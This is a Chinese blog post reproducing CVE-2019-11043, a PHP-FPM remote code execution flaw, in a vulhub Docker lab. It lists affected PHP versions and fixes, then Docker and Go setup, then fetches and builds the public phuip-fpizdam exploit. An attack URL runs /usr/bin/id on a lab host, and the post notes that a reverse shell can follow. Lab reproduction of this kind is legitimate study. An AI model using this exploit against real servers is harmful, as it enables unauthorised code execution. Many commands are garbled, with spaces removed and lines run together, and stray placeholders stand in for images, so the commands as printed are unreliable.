最新消息:XAMPP默认安装之后是很不安全的,我们只需要点击左方菜单的 "安全"选项,按照向导操作即可完成安全设置。

PHP远程代码执行漏洞(CVE-2019-11043)复现

XAMPP新闻 admin 1150浏览 0评论
漏洞详情

漏洞说明#

是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。

向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。

该漏洞需要在nginx.conf中进行特定配置才能触发

漏洞编号#

CVE-2019-11043

影响范围#

在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:

PHP 7.0 版本

PHP 7.1 版本

PHP 7.2 版本

PHP 7.3 版本

修复建议#
将PHP 7.1.X更新至7.1.33 
将PHP 7.2.X更新至7.2.24
将PHP 7.3.X更新至7.3.11 

:kali 2020.2

CentOS Linux7

https://github.com/vulhub/vulhub

    docker

curlhttps://download.docker.com/linux/centos/docker-ce.repo-o/etc/yum.repos.d/docker-ce.repoyuminstallhttps://download.docker.com/linux/fedora/30/x86_64/stable/Packages/containerd.io-1.2.6-3.3.fc30.x86_64.rpmyuminstalldocker-cesystemctl start docker

    

vi/etc/docker/daemon.json

    ,

{"registry-mirrors":["https://xxxxx.mirrors.aliyun.com"]}

AAA24

退docker

systemctldaemon-reloadsystemctl restart docker

dockerpullbusybox

hello world

dockerrunbusyboxechohelloworld

docker

https://github.com/vulhub/vulhub

/vulhub-master/vulhub-master/php/CVE-2019-11043

docker

docker-composeup-d

PS

pip

yuminstall-ypython38wgethttps://bootstrap.pypa.io/get-pip.pysudopython3get-pip.pypip-versionpip install docker-compose

litbaiZhang

启动环境之后,就可以看到漏洞环境的默认页面。在此为http://127.0.0.1:8080/index.php

AAA024


首先kali安装go环境

wget  -c https://storage.useso.com/golang/go1.13.3.linux-amd64.tar.gztar -C /usr/local -xzf go1.13.3.linux-amd64.tar.gzexport PATH=$PATH:/usr/local/go/binvim 编辑/etc/profile文件最后加上export PATH=$PATH:/usr/local/go/bin执行 source /etc/profile 命令 就安装成功了

AAA0024

下载github上公开的exp

go get github.com/neex/phuip-fpizdam

然后编译

go install github.com/neex/phuip-fpizdam

使用exp攻击demo网站

AAA00024

 http://192.168.91.133:8080/index.php?a=/usr/bin/id

AAA000024

攻击成功

还可以进行shell反弹,感兴趣的可以深入研究

转载请注明:XAMPP中文组官网 » PHP远程代码执行漏洞(CVE-2019-11043)复现

您必须 登录 才能发表评论!